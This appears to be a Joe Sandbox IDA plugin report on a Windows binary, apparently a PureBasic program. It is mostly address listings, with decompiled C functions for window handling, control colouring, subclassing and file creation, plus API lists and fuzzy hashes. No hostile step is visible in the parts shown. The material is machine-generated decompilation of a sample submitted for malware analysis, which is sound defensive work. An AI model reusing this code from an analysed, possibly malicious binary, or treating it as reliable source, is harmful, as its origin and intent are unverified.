                                                                                                                                                              0x004059b1
                                                                                                                                                              0x004059b4
                                                                                                                                                              0x004059b8
                                                                                                                                                              0x004059bb
                                                                                                                                                              0x004059c0
                                                                                                                                                              0x004059c0
                                                                                                                                                              0x004059c3
                                                                                                                                                              0x004059c7
                                                                                                                                                              0x004059ca
                                                                                                                                                              0x004059cf
                                                                                                                                                              0x004059cf
                                                                                                                                                              0x004059d2
                                                                                                                                                              0x004059d6
                                                                                                                                                              0x004059d9
                                                                                                                                                              0x004059e2
                                                                                                                                                              0x004059e2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004059d9
                                                                                                                                                              0x004058fa
                                                                                                                                                              0x004058fd
                                                                                                                                                              0x0040598d
                                                                                                                                                              0x0040598e
                                                                                                                                                              0x00405991
                                                                                                                                                              0x00405993
                                                                                                                                                              0x00405996
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405996
                                                                                                                                                              0x00405908
                                                                                                                                                              0x0040590a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405910
                                                                                                                                                              0x0040591a
                                                                                                                                                              0x00405922
                                                                                                                                                              0x00405927
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040592b
                                                                                                                                                              0x0040592e
                                                                                                                                                              0x00405930
                                                                                                                                                              0x00405958
                                                                                                                                                              0x0040595b
                                                                                                                                                              0x00405954
                                                                                                                                                              0x00405954
                                                                                                                                                              0x0040597d
                                                                                                                                                              0x0040597d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040597d
                                                                                                                                                              0x0040595d
                                                                                                                                                              0x00405962
                                                                                                                                                              0x0040596d
                                                                                                                                                              0x00405972
                                                                                                                                                              0x0040597b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040597b
                                                                                                                                                              0x00405974
                                                                                                                                                              0x00405966
                                                                                                                                                              0x00405966
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405966
                                                                                                                                                              0x00405964
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405964
                                                                                                                                                              0x00405935
                                                                                                                                                              0x0040593c
                                                                                                                                                              0x0040593f
                                                                                                                                                              0x00405945
                                                                                                                                                              0x0040594a
                                                                                                                                                              0x0040594c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040594e
                                                                                                                                                              0x0040594e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040594e
                                                                                                                                                              0x004057ca
                                                                                                                                                              0x00405891
                                                                                                                                                              0x00405893
                                                                                                                                                              0x00405895
                                                                                                                                                              0x00405899
                                                                                                                                                              0x004058c1
                                                                                                                                                              0x004058c4
                                                                                                                                                              0x004058c6
                                                                                                                                                              0x004058c8
                                                                                                                                                              0x004058cb
                                                                                                                                                              0x004058cd
                                                                                                                                                              0x004058d5
                                                                                                                                                              0x004058d5
                                                                                                                                                              0x004058cd
                                                                                                                                                              0x0040589b
                                                                                                                                                              0x004058a2
                                                                                                                                                              0x004058b2
                                                                                                                                                              0x004058b8
                                                                                                                                                              0x004058b8
                                                                                                                                                              0x00405899
                                                                                                                                                              0x004058de
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004058de
                                                                                                                                                              0x004057d0
                                                                                                                                                              0x004057d3
                                                                                                                                                              0x004057e5
                                                                                                                                                              0x004057e8
                                                                                                                                                              0x004057f5
                                                                                                                                                              0x004057fa
                                                                                                                                                              0x004057fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004057e8
                                                                                                                                                              0x004057d6
                                                                                                                                                              0x004057d7
                                                                                                                                                              0x00405830
                                                                                                                                                              0x00405833
                                                                                                                                                              0x00405821
                                                                                                                                                              0x00405821
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405821
                                                                                                                                                              0x00405835
                                                                                                                                                              0x00405838
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405841
                                                                                                                                                              0x00405841
                                                                                                                                                              0x00405843
                                                                                                                                                              0x0040586a
                                                                                                                                                              0x0040586d
                                                                                                                                                              0x00405881
                                                                                                                                                              0x00405881
                                                                                                                                                              0x00405884
                                                                                                                                                              0x00405884
                                                                                                                                                              0x00405886
                                                                                                                                                              0x00405886
                                                                                                                                                              0x00405887
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040586f
                                                                                                                                                              0x0040586f
                                                                                                                                                              0x00405872
                                                                                                                                                              0x00405872
                                                                                                                                                              0x00405872
                                                                                                                                                              0x00405876
                                                                                                                                                              0x0040587b
                                                                                                                                                              0x0040587b
                                                                                                                                                              0x0040587c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040587c
                                                                                                                                                              0x0040586d
                                                                                                                                                              0x00405845
                                                                                                                                                              0x00405845
                                                                                                                                                              0x00405846
                                                                                                                                                              0x00405849
                                                                                                                                                              0x0040585c
                                                                                                                                                              0x00405863
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405863
                                                                                                                                                              0x0040584b
                                                                                                                                                              0x0040584c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040584e
                                                                                                                                                              0x0040584e
                                                                                                                                                              0x00405855
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405855
                                                                                                                                                              0x0040584c
                                                                                                                                                              0x004057d9
                                                                                                                                                              0x004057da
                                                                                                                                                              0x0040580d
                                                                                                                                                              0x00405811
                                                                                                                                                              0x0040581c
                                                                                                                                                              0x0040581c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405811
                                                                                                                                                              0x004057df
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405808
                                                                                                                                                              0x00405782
                                                                                                                                                              0x0040578c
                                                                                                                                                              0x00405793
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405799
                                                                                                                                                              0x00405799
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405799
                                                                                                                                                              0x00405793
                                                                                                                                                              0x00405806
                                                                                                                                                              0x0040577b
                                                                                                                                                              0x00405780
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040572e
                                                                                                                                                              0x0040572e
                                                                                                                                                              0x00405736
                                                                                                                                                              0x0040573e
                                                                                                                                                              0x00405741
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405746
                                                                                                                                                              0x0040574e
                                                                                                                                                              0x00405751
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405751
                                                                                                                                                              0x00405756
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405758
                                                                                                                                                              0x00405758
                                                                                                                                                              0x00405769
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405769

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040523F: SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00405290
                                                                                                                                                                • Part of subcall function 0040523F: GetWindowRect.USER32(?,00000010), ref: 004052B8
                                                                                                                                                                • Part of subcall function 0040523F: GetWindowRect.USER32(?,00000020), ref: 004052C1
                                                                                                                                                                • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003D), ref: 004052D1
                                                                                                                                                                • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003E), ref: 004052D8
                                                                                                                                                                • Part of subcall function 0040523F: GetWindowLongA.USER32(?,000000F0), ref: 004052E2
                                                                                                                                                                • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000005), ref: 004052F1
                                                                                                                                                                • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000002E), ref: 00405311
                                                                                                                                                                • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000022), ref: 00405320
                                                                                                                                                                • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000023), ref: 00405327
                                                                                                                                                                • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003B), ref: 0040532E
                                                                                                                                                                • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003C), ref: 00405335
                                                                                                                                                                • Part of subcall function 0040523F: SendMessageA.USER32(?,00000024,00000000,00000034), ref: 0040534A
                                                                                                                                                                • Part of subcall function 0040523F: GetKeyState.USER32(00000001), ref: 0040534E
                                                                                                                                                                • Part of subcall function 0040523F: SendMessageA.USER32(?,00000201,00000001,00000000), ref: 00405364
                                                                                                                                                                • Part of subcall function 0040523F: SetCapture.USER32(?), ref: 00405369
                                                                                                                                                                • Part of subcall function 0040523F: PostMessageA.USER32(?,00000231,00000000,00000000), ref: 00405379
                                                                                                                                                              • GetPropA.USER32(?,PB_WindowID), ref: 00405736
                                                                                                                                                              • GetParent.USER32(?), ref: 00405746
                                                                                                                                                              • GetClientRect.USER32(?,00000000), ref: 004058A2
                                                                                                                                                              • FillRect.USER32(?,00000000,?), ref: 004058B2
                                                                                                                                                              • GetWindowLongA.USER32(?,000000F4), ref: 0040593F
                                                                                                                                                              • EnumChildWindows.USER32(?,004056D9,00000000), ref: 00405A05
                                                                                                                                                              • PostMessageA.USER32(?,000030D6,?,?), ref: 00405AB9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: System$Metrics$MessageRectWindow$LongPostSend$CaptureChildClientEnumFillInfoParametersParentPropStateWindows
                                                                                                                                                              • String ID: PB_WindowID
                                                                                                                                                              • API String ID: 3162925107-1508741625
                                                                                                                                                              • Opcode ID: 57c730f274317fda02807e17650faa5da67cc4a28ae41b1b925619af7619a5b7
                                                                                                                                                              • Instruction ID: 29e404874b04c4d69bc6432aaff022b43f6243613acb16a20f2353146ae1e986
                                                                                                                                                              • Opcode Fuzzy Hash: 57c730f274317fda02807e17650faa5da67cc4a28ae41b1b925619af7619a5b7
                                                                                                                                                              • Instruction Fuzzy Hash: FAB1AE71600A06EBDF20AF55C884ABB7BB1EB54314F60843BF845B62D0D3399A91EF5D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E0040384E(struct HWND__* _a4) {
                                                                                                                                                              				long _t3;
                                                                                                                                                              				struct HWND__* _t16;
                                                                                                                                                              				intOrPtr* _t18;
                                                                                                                                                              
                                                                                                                                                              				_t16 = _a4;
                                                                                                                                                              				_t3 = GetWindowThreadProcessId(_t16, 0);
                                                                                                                                                              				if(_t3 == GetCurrentThreadId() && IsWindowVisible(_t16) != 0 && IsWindowEnabled(_t16) != 0 && _t16 != GetForegroundWindow()) {
                                                                                                                                                              					EnableWindow(_t16, 0);
                                                                                                                                                              					_push(0x10);
                                                                                                                                                              					_t18 = E004067DA(0x40b1c0);
                                                                                                                                                              					 *(_t18 + 4) = _t16;
                                                                                                                                                              					 *_t18 = GetCurrentThreadId();
                                                                                                                                                              				}
                                                                                                                                                              				return 1;
                                                                                                                                                              			}






                                                                                                                                                              0x00403851
                                                                                                                                                              0x00403858
                                                                                                                                                              0x0040386a
                                                                                                                                                              0x0040388f
                                                                                                                                                              0x00403895
                                                                                                                                                              0x004038a2
                                                                                                                                                              0x004038a5
                                                                                                                                                              0x004038aa
                                                                                                                                                              0x004038aa
                                                                                                                                                              0x004038b2

                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00403858
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00403866
                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 0040386D
                                                                                                                                                              • IsWindowEnabled.USER32(?), ref: 00403878
                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00403882
                                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 0040388F
                                                                                                                                                                • Part of subcall function 004067DA: RtlAllocateHeap.NTDLL(00000008,?,00406649), ref: 004067E6
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004038A8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapProcessVisible
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2983394722-0
                                                                                                                                                              • Opcode ID: c450f822fb23aaa1f07191116ce03786d4f9d21f61ba6e89b33f6b73c8d7f18a
                                                                                                                                                              • Instruction ID: b1902f0b285d8ff1f38c9be8955405961f45d1445ca6c4829f96fecf42db4020
                                                                                                                                                              • Opcode Fuzzy Hash: c450f822fb23aaa1f07191116ce03786d4f9d21f61ba6e89b33f6b73c8d7f18a
                                                                                                                                                              • Instruction Fuzzy Hash: 06F0F9322047109BE321BF75AD88B2F7AF8EF45B61B14843AF541F3291DB38D851966E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004042DD(struct HWND__** _a4, intOrPtr _a12, struct HDC__* _a16) {
                                                                                                                                                              				long _t9;
                                                                                                                                                              				long _t10;
                                                                                                                                                              				struct HDC__* _t19;
                                                                                                                                                              				struct HWND__** _t24;
                                                                                                                                                              				struct HWND__* _t25;
                                                                                                                                                              
                                                                                                                                                              				_t24 = _a4;
                                                                                                                                                              				_t25 = 0xd0d0d0d1;
                                                                                                                                                              				if(_a12 == 0x133 || _a12 == 0x138 && IsWindowEnabled( *_t24) != 0) {
                                                                                                                                                              					_t9 = _t24[5];
                                                                                                                                                              					_t19 = _a16;
                                                                                                                                                              					if(_t9 != 0xffffffff) {
                                                                                                                                                              						SetTextColor(_t19, _t9);
                                                                                                                                                              						if(_t24[4] == 0xffffffff) {
                                                                                                                                                              							SetBkColor(_t19, GetSysColor(0x14));
                                                                                                                                                              							_t25 = GetSysColorBrush(0x14);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t10 = _t24[4];
                                                                                                                                                              					if(_t10 != 0xffffffff) {
                                                                                                                                                              						SetBkColor(_t19, _t10);
                                                                                                                                                              						_t25 = _t24[6];
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t25;
                                                                                                                                                              			}








                                                                                                                                                              0x004042e7
                                                                                                                                                              0x004042eb
                                                                                                                                                              0x004042f0
                                                                                                                                                              0x00404308
                                                                                                                                                              0x0040430f
                                                                                                                                                              0x0040431a
                                                                                                                                                              0x0040431e
                                                                                                                                                              0x00404328
                                                                                                                                                              0x00404334
                                                                                                                                                              0x0040433e
                                                                                                                                                              0x0040433e
                                                                                                                                                              0x00404328
                                                                                                                                                              0x00404340
                                                                                                                                                              0x00404346
                                                                                                                                                              0x0040434a
                                                                                                                                                              0x0040434c
                                                                                                                                                              0x0040434c
                                                                                                                                                              0x00404350
                                                                                                                                                              0x00404355

                                                                                                                                                              APIs
                                                                                                                                                              • IsWindowEnabled.USER32(00000133), ref: 004042FE
                                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 0040431E
                                                                                                                                                              • GetSysColor.USER32(00000014), ref: 0040432C
                                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00404334
                                                                                                                                                              • GetSysColorBrush.USER32(00000014), ref: 00404338
                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040434A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Color$BrushEnabledTextWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3110319690-0
                                                                                                                                                              • Opcode ID: 2586222dea3612670b7304aedc5cdf2e6f6e10432f4c11a66ce39ca8f2a3d8e0
                                                                                                                                                              • Instruction ID: 3bac33a7e9d7aff12e56e7c95b9a227e0688ac08b885ac0313a6761ddb88b25f
                                                                                                                                                              • Opcode Fuzzy Hash: 2586222dea3612670b7304aedc5cdf2e6f6e10432f4c11a66ce39ca8f2a3d8e0
                                                                                                                                                              • Instruction Fuzzy Hash: F2012171200305AFD620AB69AC48957B3FCEB84331F045B3AFA65E32E1C774EC158A26
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004047BB(void* __ecx, void* _a4, struct HWND__* _a8, struct HWND__* _a12, intOrPtr _a16) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				intOrPtr _t16;
                                                                                                                                                              				struct HWND__* _t22;
                                                                                                                                                              				struct HWND__* _t24;
                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                              				struct HWND__* _t32;
                                                                                                                                                              
                                                                                                                                                              				_t16 = E0040642D( *0x40b428);
                                                                                                                                                              				_t32 = _a8;
                                                                                                                                                              				_v8 = _t16;
                                                                                                                                                              				if(_a4 == 0xffffffff) {
                                                                                                                                                              					_a4 = _t32;
                                                                                                                                                              				}
                                                                                                                                                              				_t24 = _a12;
                                                                                                                                                              				_t32->i = _t24;
                                                                                                                                                              				 *((intOrPtr*)(_t32 + 4)) = _a16;
                                                                                                                                                              				 *((intOrPtr*)(_t32 + 0xc)) = SetWindowLongA(_t24, 0xfffffffc, E00404714);
                                                                                                                                                              				SetWindowLongA(_t24, 0xfffffff4, _a4);
                                                                                                                                                              				SetPropA(_t24, "PB_ID", _a4);
                                                                                                                                                              				_t29 = _v8;
                                                                                                                                                              				SendMessageA(_t24, 0x30,  *(_t29 + 8), 1);
                                                                                                                                                              				 *(_t29 + 4) =  *(_t29 + 4) & 0x00000000;
                                                                                                                                                              				_t22 = _t32;
                                                                                                                                                              				if(_a4 != _t32) {
                                                                                                                                                              					_t22 = _t24;
                                                                                                                                                              				}
                                                                                                                                                              				return _t22;
                                                                                                                                                              			}









                                                                                                                                                              0x004047c8
                                                                                                                                                              0x004047d1
                                                                                                                                                              0x004047d4
                                                                                                                                                              0x004047d7
                                                                                                                                                              0x004047d9
                                                                                                                                                              0x004047d9
                                                                                                                                                              0x004047dc
                                                                                                                                                              0x004047f0
                                                                                                                                                              0x004047f2
                                                                                                                                                              0x004047fa
                                                                                                                                                              0x00404800
                                                                                                                                                              0x0040480b
                                                                                                                                                              0x00404811
                                                                                                                                                              0x0040481c
                                                                                                                                                              0x00404822
                                                                                                                                                              0x00404829
                                                                                                                                                              0x0040482b
                                                                                                                                                              0x0040482d
                                                                                                                                                              0x0040482d
                                                                                                                                                              0x00404833

                                                                                                                                                              APIs
                                                                                                                                                              • SetWindowLongA.USER32(000000FF,000000FC,00404714), ref: 004047F5
                                                                                                                                                              • SetWindowLongA.USER32(000000FF,000000F4,000000FF), ref: 00404800
                                                                                                                                                              • SetPropA.USER32(000000FF,PB_ID,000000FF), ref: 0040480B
                                                                                                                                                              • SendMessageA.USER32(000000FF,00000030,000000FF,00000001), ref: 0040481C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LongWindow$MessagePropSend
                                                                                                                                                              • String ID: PB_ID
                                                                                                                                                              • API String ID: 499798845-4173770792
                                                                                                                                                              • Opcode ID: 6c9e0b72c496245141bbbd0762a8a9e14c4b78381a73b06c8fa17946a66a15c7
                                                                                                                                                              • Instruction ID: 95a633425f538de9a54c52fb3ff2f65ec4db39112d0deefb15a4c97684d4ca47
                                                                                                                                                              • Opcode Fuzzy Hash: 6c9e0b72c496245141bbbd0762a8a9e14c4b78381a73b06c8fa17946a66a15c7
                                                                                                                                                              • Instruction Fuzzy Hash: 900192B5500308BFCB119F55DD84E8A7BB8FB44760F20C626F925672D1C374D950CBA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00406060(long __eax, CHAR* __ebx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				void* _v4;
                                                                                                                                                              				intOrPtr _t13;
                                                                                                                                                              				intOrPtr _t23;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                              				long _t26;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              
                                                                                                                                                              				_t23 =  *0x40b43c; // 0x21405a8
                                                                                                                                                              				_t26 = __eax;
                                                                                                                                                              				_t25 = E0040662C(_t23, _a4);
                                                                                                                                                              				if(_t26 != 1) {
                                                                                                                                                              					if(_t26 != 2) {
                                                                                                                                                              						if(_t26 != 3) {
                                                                                                                                                              							_t27 = _v4;
                                                                                                                                                              							goto L8;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t27 = CreateFileA(__ebx, 0xc0000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                              							if(_t27 != 0xffffffff) {
                                                                                                                                                              								goto L9;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t27 = CreateFileA(__ebx, 0x40000000, 1, 0, 5, 0, 0);
                                                                                                                                                              								goto L8;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_t27 = CreateFileA(__ebx, 0xc0000000, 1, 0, 4, 0x80, 0);
                                                                                                                                                              						goto L8;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t27 = CreateFileA(__ebx, 0x80000000, _t26, 0, 3, 0x80, 0);
                                                                                                                                                              					L8:
                                                                                                                                                              					if(_t27 == 0xffffffff) {
                                                                                                                                                              						L13:
                                                                                                                                                              						if(_a4 == 0xffffffff) {
                                                                                                                                                              							_t13 =  *0x40b43c; // 0x21405a8
                                                                                                                                                              							E004066BB(_t13, _t25);
                                                                                                                                                              						}
                                                                                                                                                              						return 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						L9:
                                                                                                                                                              						if(_t27 == 0) {
                                                                                                                                                              							goto L13;
                                                                                                                                                              						} else {
                                                                                                                                                              							 *_t25 = _t27;
                                                                                                                                                              							_t24 =  *0x40b0f8; // 0x2140000
                                                                                                                                                              							 *((intOrPtr*)(_t25 + 4)) = RtlAllocateHeap(_t24, 0, 0x1000);
                                                                                                                                                              							 *(_t25 + 8) = 0x1000;
                                                                                                                                                              							 *(_t25 + 0xc) = 0;
                                                                                                                                                              							 *(_t25 + 0x14) = 1;
                                                                                                                                                              							if(_v4 != 0xffffffff) {
                                                                                                                                                              								return _t27;
                                                                                                                                                              							} else {
                                                                                                                                                              								return _t25;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}










                                                                                                                                                              0x00406061
                                                                                                                                                              0x0040606a
                                                                                                                                                              0x0040607a
                                                                                                                                                              0x0040607c
                                                                                                                                                              0x0040609d
                                                                                                                                                              0x004060bf
                                                                                                                                                              0x004060f9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060c1
                                                                                                                                                              0x004060dc
                                                                                                                                                              0x004060e1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060e3
                                                                                                                                                              0x004060f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060f5
                                                                                                                                                              0x004060e1
                                                                                                                                                              0x0040609f
                                                                                                                                                              0x004060b8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060b8
                                                                                                                                                              0x0040607e
                                                                                                                                                              0x00406096
                                                                                                                                                              0x004060fd
                                                                                                                                                              0x00406100
                                                                                                                                                              0x00406149
                                                                                                                                                              0x0040614e
                                                                                                                                                              0x00406150
                                                                                                                                                              0x00406157
                                                                                                                                                              0x00406157
                                                                                                                                                              0x00406162
                                                                                                                                                              0x00406102
                                                                                                                                                              0x00406102
                                                                                                                                                              0x00406104
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406106
                                                                                                                                                              0x0040610b
                                                                                                                                                              0x0040610d
                                                                                                                                                              0x00406121
                                                                                                                                                              0x00406124
                                                                                                                                                              0x0040612b
                                                                                                                                                              0x00406132
                                                                                                                                                              0x00406139
                                                                                                                                                              0x00406148
                                                                                                                                                              0x0040613b
                                                                                                                                                              0x00406141
                                                                                                                                                              0x00406141
                                                                                                                                                              0x00406139
                                                                                                                                                              0x00406104
                                                                                                                                                              0x00406100

                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,021405A8,?,?,?,021412D0,?,00406244,00000001,00000001), ref: 00406090
                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000,021405A8,?,?,?,021412D0,?,00406244,00000001,00000001), ref: 004060B2
                                                                                                                                                              • RtlAllocateHeap.NTDLL(02140000,00000000,00001000), ref: 00406116
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile$AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2813278966-0
                                                                                                                                                              • Opcode ID: aaea696fe30d237ab769c408f8669e979df440928f28e225a3f20fdb7f4e7eba
                                                                                                                                                              • Instruction ID: 22e7740ac045cd4ad30a1761b82f9b87c0991fe1563c31a0c7e75b116f9b4f37
                                                                                                                                                              • Opcode Fuzzy Hash: aaea696fe30d237ab769c408f8669e979df440928f28e225a3f20fdb7f4e7eba
                                                                                                                                                              • Instruction Fuzzy Hash: 7321D67278031176E2309B28AC46F57B358A744B71F22873AF762BB2C0C7B5AC64479D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405BB5(struct HWND__* _a4, intOrPtr* _a8) {
                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                              				struct HWND__* _t16;
                                                                                                                                                              				intOrPtr* _t18;
                                                                                                                                                              
                                                                                                                                                              				_t16 = _a4;
                                                                                                                                                              				_t15 = 1;
